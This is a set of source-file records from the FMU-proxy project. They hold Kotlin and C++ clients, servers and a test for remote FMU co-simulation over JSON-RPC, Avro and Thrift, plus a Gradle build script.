"is_vendor": false, "language": "Kotlin", "length_bytes": 7989, "license_type": "permissive", "max_line_length": 96, "num_lines": 207, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/jsonrpc/JsonRpcFmuClient.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.jsonrpc\n\nimport info.laht.yajrpc.RpcParams\nimport info.laht.yajrpc.net.RpcClient\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelDescriptionImpl\nimport no.mechatronics.sfi.fmuproxy.RpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.Solver\n\nprivate const val SERVICE = \"FmuService\"\n\nclass JsonRpcFmuClient(\n        val client: RpcClient\n): RpcFmuClient() {\n\n    val fmiVersion: String by lazy {\n        client.write(\"$SERVICE.getFmiVersion\")\n                .getResult(String::class.java)!!\n    }\n\n    val modelName: String by lazy {\n        client.write(\"$SERVICE.getModelName\")\n                .getResult<String>()!!\n    }\n\n    val guid: String by lazy {\n        client.write(\"$SERVICE.getGuid\")\n                .getResult(String::class.java)!!\n    }\n\n    override val modelDescription: CommonModelDescription by lazy {\n        client.write(\"$SERVICE.getModelDescription\")\n                .getResult(ModelDescriptionImpl::class.java)!!\n    }\n\n    override val modelDescriptionXml: String by lazy {\n        client.write(\"$SERVICE.getModelDescriptionXml\")\n                .getResult(String::class.java)!!\n    }\n\n    /**\n     * Terminates the FMU and closes the client connection\n     */\n    override fun close() {\n        super.close()\n        client.close()\n    }\n\n    override fun isTerminated(fmuId: Int): Boolean {\n        return client.write(\"$SERVICE.isTerminated\", RpcParams.listParams(fmuId))\n                .getResult<Boolean>()!!\n    }\n\n    override fun readInteger(fmuId: Int, vr: ValueReference): FmuIntegerRead {\n        return client.write(\"$SERVICE.readInteger\", RpcParams.listParams(fmuId, vr))\n                .getResult<FmuIntegerRead>()!!\n    }\n\n    override fun bulkReadInteger(fmuId: Int, vr: List<Int>): FmuIntegerArrayRead {\n        return client.write(\"$SERVICE.bulkReadInteger\", RpcParams.listParams(fmuId, vr))\n                .getResult<FmuIntegerArrayRead>()!!\n    }\n\n    override fun readReal(fmuId: Int, vr: ValueReference): FmuRealRead {\n        return client.write(\"$SERVICE.readReal\", RpcParams.listParams(fmuId, vr))\n                .getResult<FmuRealRead>()!!\n    }\n\n    override fun bulkReadReal(fmuId: Int, vr: List<Int>): FmuRealArrayRead {\n        return client.write(\"$SERVICE.bulkReadReal\", RpcParams.listParams(fmuId, vr))\n                .getResult<FmuRealArrayRead>()!!\n    }\n\n    override fun readString(fmuId: Int, vr: ValueReference): FmuStringRead {\n        return client.write(\"$SERVICE.readString\", RpcParams.listParams(fmuId, vr))\n                .getResult<FmuStringRead>()!!\n    }\n\n    override fun bulkReadString(fmuId: Int, vr: List<Int>): FmuStringArrayRead {\n        return client.write(\"$SERVICE.bulkReadString\", RpcParams.listParams(fmuId, vr))\n                .getResult<FmuStringArrayRead>()!!\n    }\n\n    override fun readBoolean(fmuId: Int, vr: ValueReference): FmuBooleanRead {\n        return client.write(\"$SERVICE.readBoolean\", RpcParams.listParams(fmuId, vr))\n                .getResult<FmuBooleanRead>()!!\n    }\n\n    override fun bulkReadBoolean(fmuId: Int, vr: List<Int>): FmuBooleanArrayRead {\n        return client.write(\"$SERVICE.bulkReadBoolean\", RpcParams.listParams(fmuId, vr))\n                .getResult<FmuBooleanArrayRead>()!!\n    }\n\n    override fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus {\n        return client.write(\"$SERVICE.writeInteger\", RpcParams.listParams(fmuId, vr, value))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun 
bulkWriteInteger(fmuId: Int, vr: List<Int>, value: List<Int>): FmiStatus {\n        return client.write(\"$SERVICE.bulkWriteInteger\", RpcParams.listParams(fmuId, vr, value))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun writeReal(fmuId: Int, vr: ValueReference, value: Real): FmiStatus {\n        return client.write(\"$SERVICE.writeReal\", RpcParams.listParams(fmuId, vr, value))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun bulkWriteReal(fmuId: Int, vr: List<Int>, value: List<Real>): FmiStatus {\n        return client.write(\"$SERVICE.bulkWriteReal\", RpcParams.listParams(fmuId, vr, value))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus {\n        return client.write(\"$SERVICE.writeString\", RpcParams.listParams(fmuId, vr, value))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun bulkWriteString(fmuId: Int, vr: List<Int>, value: List<String>): FmiStatus {\n        return client.write(\"$SERVICE.bulkWriteString\", RpcParams.listParams(fmuId, vr, value))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): FmiStatus {\n        return client.write(\"$SERVICE.writeBoolean\", RpcParams.listParams(fmuId, vr, value))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun bulkWriteBoolean(fmuId: Int, vr: List<Int>, value: List<Boolean>): FmiStatus {\n        return client.write(\"$SERVICE.bulkWriteBoolean\", RpcParams.listParams(fmuId, vr, value))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun getCurrentTime(fmuId: Int): Double {\n        return client.write(\"$SERVICE.getCurrentTime\", RpcParams.listParams(fmuId))\n                .getResult<Double>()!!\n    }\n\n    override fun init(fmuId: Int, start: Double, stop: Double): FmiStatus {\n        return client.write(\"$SERVICE.init\", RpcParams.listParams(fmuId, start, stop))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun step(fmuId: Int, stepSize: Double): Pair<Double, FmiStatus> {\n        return client.write(\"$SERVICE.step\", RpcParams.listParams(fmuId, stepSize))\n                .getResult<StepResult>()!!.let { it.asPair() }\n    }\n\n    /**\n     * Resets the FMU\n     */\n    override fun reset(fmuId: Int): FmiStatus {\n        return client.write(\"$SERVICE.reset\", RpcParams.listParams(fmuId))\n                .getResult<FmiStatus>()!!\n    }\n\n    /**\n     * Terminates the FMU\n     */\n    override fun terminate(fmuId: Int): FmiStatus {\n        return client.write(\"$SERVICE.terminate\", RpcParams.listParams(fmuId))\n                .getResult<FmiStatus>()!!\n    }\n\n    override fun createInstanceFromCS(): ValueReference {\n        return client.write(\"$SERVICE.createInstanceFromCS\")\n                .getResult<ValueReference>()!!\n    }\n\n    override fun createInstanceFromME(solver: Solver): Int {\n        return client.write(\"$SERVICE.createInstanceFromME\", RpcParams.listParams(solver))\n                .getResult<ValueReference>()!!\n    }\n\n    internal class StepResult(\n            var simulationTime: Double,\n            var status: FmiStatus\n    ) {\n        fun asPair() = simulationTime to status\n    }\n\n}" }, { "alpha_fraction": 0.5559006333351135, "alphanum_fraction": 0.5757763981819153, "avg_line_length": 21.33333396911621, "blob_id": "ab536c9421ea324b493bd03517c576089ad9e902", "content_id": "9f5361bf776d2c7894c7cd2d25804b0e8755a94b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1610, "license_type": "permissive", "max_line_length": 77, "num_lines": 72, "path": "/java/FMU-proxy/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nprintln \"Gradle version is ${GradleVersion.current().version}\"\n\nbuildscript {\n    ext.kotlin_version = '1.2.41'\n\n    
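    // Usage sketch for the JsonRpcFmuClient defined above, kept as a comment so it
    // does not affect this build script. It assumes an already connected client and
    // that the fmuId-based overrides are publicly accessible; `simulateOnce` is a
    // hypothetical helper, not part of the project:
    //
    //     fun simulateOnce(client: JsonRpcFmuClient) {
    //         val fmuId = client.createInstanceFromCS()
    //         client.init(fmuId, 0.0, 10.0)         // start and stop are both forwarded
    //         var time = 0.0
    //         while (time < 10.0) {
    //             val (simTime, status) = client.step(fmuId, 1E-3)
    //             if (status != FmiStatus.OK) break  // stop on the first non-OK status
    //             time = simTime
    //         }
    //         client.terminate(fmuId)
    //     }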
repositories {\n mavenCentral()\n }\n dependencies {\n classpath \"org.jetbrains.kotlin:kotlin-gradle-plugin:$kotlin_version\"\n }\n}\n\nwrapper {\n gradleVersion = '4.7'\n}\n\next.fmi4j_stable_version = '0.7.1'\next.fmi4j_snapshot_version = '0.7.2-SNAPSHOT'\n\nsubprojects { sub ->\n\n apply plugin: 'java'\n\n sourceCompatibility = 1.8\n [compileJava, compileTestJava]*.options*.encoding = 'UTF-8'\n\n repositories {\n mavenCentral()\n maven {\n url \"https://oss.sonatype.org/content/repositories/snapshots/\"\n }\n }\n\n configurations.all {\n resolutionStrategy.cacheChangingModulesFor 0, 'seconds'\n }\n\n dependencies {\n\n sub.plugins.withId('kotlin') {\n compile \"org.jetbrains.kotlin:kotlin-stdlib-jdk8:$kotlin_version\"\n }\n\n testImplementation('org.junit.jupiter:junit-jupiter-api:5.2.0')\n testImplementation('org.junit.jupiter:junit-jupiter-params:5.2.0')\n testRuntimeOnly('org.junit.jupiter:junit-jupiter-engine:5.2.0')\n\t\t\n }\n\n test {\n useJUnitPlatform()\n }\n \n sub.plugins.withId('kotlin') {\n compileKotlin {\n kotlinOptions {\n jvmTarget = \"1.8\"\n javaParameters = true\n freeCompilerArgs = ['-Xenable-jvm-default']\n }\n }\n\n compileTestKotlin {\n kotlinOptions {\n jvmTarget = \"1.8\"\n javaParameters = true\n }\n }\n }\n\n}\n\n" }, { "alpha_fraction": 0.7544625401496887, "alphanum_fraction": 0.7592225074768066, "avg_line_length": 38.40625, "blob_id": "a413098d96b090cda491ee710b14782727825f38", "content_id": "9ce05ab61d78c4904f592c02e345831e5a98d199", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2521, "license_type": "permissive", "max_line_length": 87, "num_lines": 64, "path": "/cpp/FMU-proxy/client/ThriftClient.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#include <iostream>\n\n#include <thrift/transport/TSocket.h>\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/transport/TTransportUtils.h>\n\n#include \"../common/thrift-gen/FmuService.h\"\n#include \"../common/thrift-gen/definitions_types.h\"\n\n#include \"ThriftClient.h\"\n\nusing namespace std;\nusing namespace apache::thrift;\nusing namespace apache::thrift::protocol;\nusing namespace apache::thrift::transport;\n\nusing namespace fmuproxy::thrift;\nusing namespace fmuproxy::client;\n\n::ThriftClient::ThriftClient(const char* host, int port) {\n    shared_ptr<TTransport> socket(new TSocket(host, port));\n    transport = shared_ptr<TBufferedTransport>(new TBufferedTransport(socket));\n    shared_ptr<TProtocol> protocol(new TBinaryProtocol(transport));\n    this->client = shared_ptr<FmuServiceClient>(new FmuServiceClient(protocol));\n    transport->open();\n}\n\nshared_ptr<ModelDescription> ThriftClient::getModelDescription() {\n    if (!modelDescription) {\n        modelDescription = shared_ptr<ModelDescription>(new ModelDescription());\n        client->getModelDescription(*modelDescription);\n    }\n    return modelDescription;\n}\n\nshared_ptr<RemoteFmuInstance> ThriftClient::newInstance() {\n    FmuId fmu_id = client->createInstanceFromCS();\n    std::shared_ptr<RemoteFmuInstance> instance(new RemoteFmuInstance(fmu_id, client));\n    return instance;\n}" }, { "alpha_fraction": 0.6655036807060242, "alphanum_fraction": 0.6674662232398987, "avg_line_length": 39.409690856933594, "blob_id": "250d87edf27c3f46223d19a7b2ec76e1c1f541c3", "content_id": "7cf8087d8f32c6c71dbdeac1fd3fef56cf1c6343", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 9172, "license_type": "permissive", "max_line_length": 103, "num_lines": 227, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/avro/services/AvroFmuServiceImpl.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.avro.services\n\nimport no.mechatronics.sfi.fmi4j.common.ValueReference\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CoSimulationModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelExchangeModelDescription\nimport no.mechatronics.sfi.fmuproxy.avro.*\nimport no.mechatronics.sfi.fmuproxy.fmu.Fmus\nimport no.mechatronics.sfi.fmuproxy.solver.parseIntegrator\nimport org.apache.commons.math3.ode.FirstOrderIntegrator\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\nclass AvroFmuServiceImpl(\n private val fmu: Fmu\n): AvroFmuService {\n\n override fun getCurrentTime(fmuId: Int): Double {\n return Fmus.get(fmuId)?.let {\n it.currentTime\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun createInstanceFromCS(): Int {\n if (!fmu.supportsCoSimulation) {\n throw UnsupportedOperationException(\"FMU does not support CoSimulation!\")\n }\n return Fmus.put(fmu.asCoSimulationFmu().newInstance())\n }\n\n override fun createInstanceFromME(solver: Solver): Int {\n\n fun selectDefaultIntegrator(): FirstOrderIntegrator {\n val stepSize = fmu.modelDescription.defaultExperiment?.stepSize ?: 1E-3\n LOG.warn(\"No valid integrator found.. Defaulting to Euler with $stepSize stepSize\")\n return org.apache.commons.math3.ode.nonstiff.EulerIntegrator(stepSize)\n }\n\n val integrator = parseIntegrator(solver.name, solver.settings) ?: selectDefaultIntegrator()\n return Fmus.put(fmu.asModelExchangeFmu().newInstance(integrator))\n\n }\n\n override fun isTerminated(fmuId: Int): Boolean {\n return Fmus.get(fmuId)?.let {\n it.isTerminated\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun getModelDescriptionXml(): String {\n return fmu.modelDescriptionXml\n }\n\n override fun init(fmuId: Int, start: Double, stop: Double): Status {\n return Fmus.get(fmuId)?.let {\n it.init(start, stop)\n it.lastStatus.avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun step(fmuId: Int, step_size: Double): StepResult {\n return Fmus.get(fmuId)?.let {\n it.doStep(step_size)\n StepResult().apply {\n simulationTime = it.currentTime\n status = it.lastStatus.avroType()\n }\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n\n override fun terminate(fmuId: Int): Status {\n return Fmus.get(fmuId)?.let {\n it.terminate()\n it.lastStatus.avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun reset(fmuId: Int): Status {\n return Fmus.get(fmuId)?.let {\n it.reset()\n it.lastStatus.avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n\n override fun canGetAndSetFMUstate(fmuId: Int): Boolean {\n return Fmus.get(fmuId)?.let {\n val md = it.modelDescription\n when (md) {\n is CoSimulationModelDescription -> md.canGetAndSetFMUstate\n is ModelExchangeModelDescription -> md.canGetAndSetFMUstate\n else -> throw AssertionError(\"ModelDescription is not of type CS or ME?\")\n }\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n\n override fun getModelDescription(): ModelDescription {\n return fmu.modelDescription.avroType()\n }\n\n override fun writeString(fmuId: Int, vr: ValueReference, 
value: String): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeString(vr, value).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun readReal(fmuId: Int, vr: ValueReference): RealRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readReal(vr).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkWriteReal(fmuId: Int, vr: List<ValueReference>, value: List<Double>): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeReal(vr.toIntArray(), value.toDoubleArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkReadBoolean(fmuId: Int, vr: List<ValueReference>): BooleanArrayRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readBoolean(vr.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkWriteString(fmuId: Int, vr: List<ValueReference>, value: List<String>): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeString(vr.toIntArray(), value.toTypedArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeBoolean(vr, value).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun writeReal(fmuId: Int, vr: ValueReference, value: Double): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeReal(vr, value).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeInteger(vr, value).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun readString(fmuId: Int, vr: ValueReference): StringRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readString(vr).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun readBoolean(fmuId: Int, vr: ValueReference): BooleanRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readBoolean(vr).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkWriteInteger(fmuId: Int, vr: List<ValueReference>, value: List<Int>): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeInteger(vr.toIntArray(), value.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun readInteger(fmuId: Int, vr: ValueReference): IntegerRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readInteger(vr).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkReadInteger(fmuId: Int, vr: List<ValueReference>): IntegerArrayRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readInteger(vr.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkReadReal(fmuId: Int, vr: List<ValueReference>): RealArrayRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readReal(vr.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkReadString(fmuId: Int, vr: List<ValueReference>): StringArrayRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readString(vr.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with 
id=$fmuId\")\n }\n\n override fun bulkWriteBoolean(fmuId: Int, vr: List<ValueReference>, value: List<Boolean>): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeBoolean(vr.toIntArray(), value.toBooleanArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n private companion object {\n val LOG: Logger = LoggerFactory.getLogger(AvroFmuServiceImpl::class.java)\n }\n\n}" }, { "alpha_fraction": 0.7056108117103577, "alphanum_fraction": 0.7095170617103577, "avg_line_length": 35.11538314819336, "blob_id": "019af844e451cd7ad81b7ab88377260dd4e985ca", "content_id": "289bf6eab9b9d732536f04ab11100ec4b5cc30e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2816, "license_type": "permissive", "max_line_length": 94, "num_lines": 78, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/thrift/ThriftFmuServer.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.thrift\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.net.FmuProxyServer\nimport no.mechatronics.sfi.fmuproxy.thrift.services.ThriftFmuServiceImpl\nimport org.apache.thrift.server.TServer\nimport org.apache.thrift.server.TSimpleServer\nimport org.apache.thrift.transport.TServerSocket\nimport org.apache.thrift.transport.TServerTransport\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\n\nclass ThriftFmuServer(\n fmu: Fmu\n): FmuProxyServer {\n\n override var port: Int? = null\n override val simpleName = \"thrift/tcp\"\n\n private var server: TServer? = null\n private var serverTransport: TServerTransport? 
= null\n\n private val handler = ThriftFmuServiceImpl(fmu)\n private val processor = FmuService.Processor(handler)\n\n val isRunning: Boolean\n get() = server != null\n\n override fun start(port: Int) {\n if (!isRunning) {\n serverTransport = TServerSocket(port).also { this.port = port }\n server = TSimpleServer(TServer.Args(serverTransport).processor(processor)).apply {\n Thread { serve() }.start()\n }\n LOG.info(\"${javaClass.simpleName} listening for connections on port: $port\")\n } else {\n LOG.warn(\"${javaClass.simpleName} has already been started!\")\n }\n }\n\n override fun stop() {\n if (isRunning) {\n server!!.stop()\n server = null\n LOG.info(\"${javaClass.simpleName} stopped!\")\n }\n }\n\n private companion object {\n val LOG: Logger = LoggerFactory.getLogger(ThriftFmuServer::class.java)\n }\n\n}" }, { "alpha_fraction": 0.6816028952598572, "alphanum_fraction": 0.6903460621833801, "avg_line_length": 32.88888931274414, "blob_id": "527f1a284a18d07eeba2d07c647288fad52c2ff5", "content_id": "b0d1d55775ae5185c8779b264ac9c6daa5301cb7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2745, "license_type": "permissive", "max_line_length": 85, "num_lines": 81, "path": "/cpp/FMU-proxy/test/ThriftClientTest.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#include <iostream>\n#include <ctime>\n\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/transport/TSocket.h>\n#include <thrift/transport/TTransportUtils.h>\n\n#include "../common/thrift-gen/FmuService.h"\n#include "../common/thrift-gen/definitions_types.h"\n\n#include "../client/ThriftClient.h"\n\nusing namespace std;\nusing namespace apache::thrift;\nusing namespace apache::thrift::protocol;\nusing namespace apache::thrift::transport;\n\nusing namespace fmuproxy::thrift;\nusing namespace fmuproxy::client;\n\nconst double stop = 10;\nconst double step_size = 1E-4;\n\nint main() {\n\n    try {\n\n        ThriftClient client = ThriftClient("localhost", 9090);\n\n        shared_ptr<ModelDescription> modelDescription = client.getModelDescription();\n        cout << "GUID=" << modelDescription->guid << endl;\n        cout << "modelName=" << modelDescription->modelName << endl;\n        cout << "license=" << modelDescription->license << endl;\n\n        for (auto var : modelDescription->modelVariables) {\n            cout << "name= " << var.name << endl;\n        }\n\n        shared_ptr<RemoteFmuInstance> instance = client.newInstance();\n        instance->init(0.0, 0.0);\n\n        RealRead read;\n        StepResult result;\n        while (result.simulationTime < stop) { // step until the named stop time\n            instance->step(result, step_size);\n            instance->readReal(read, 47);\n        }\n\n        auto status = instance->terminate();\n        cout << "terminated FMU with status " << status << endl;\n\n        client.close();\n\n    } catch (TException& tx) {\n        cout << "ERROR: " << tx.what() << endl;\n    }\n}\n" }, { "alpha_fraction": 0.6932916641235352, "alphanum_fraction": 0.7012507319450378, "avg_line_length": 32.574073791503906, "blob_id": "c34df45d65936b5767260e9fabe8f4dd12d81602", "content_id": "e9be73799c1d1ead0c504e8a28899ada2a873b0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3518, "license_type": "permissive", "max_line_length": 92, "num_lines": 108, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/grpc/TestGrpcBouncingCS.kt", "repo_name": "johanrhodin/FMU-proxy", 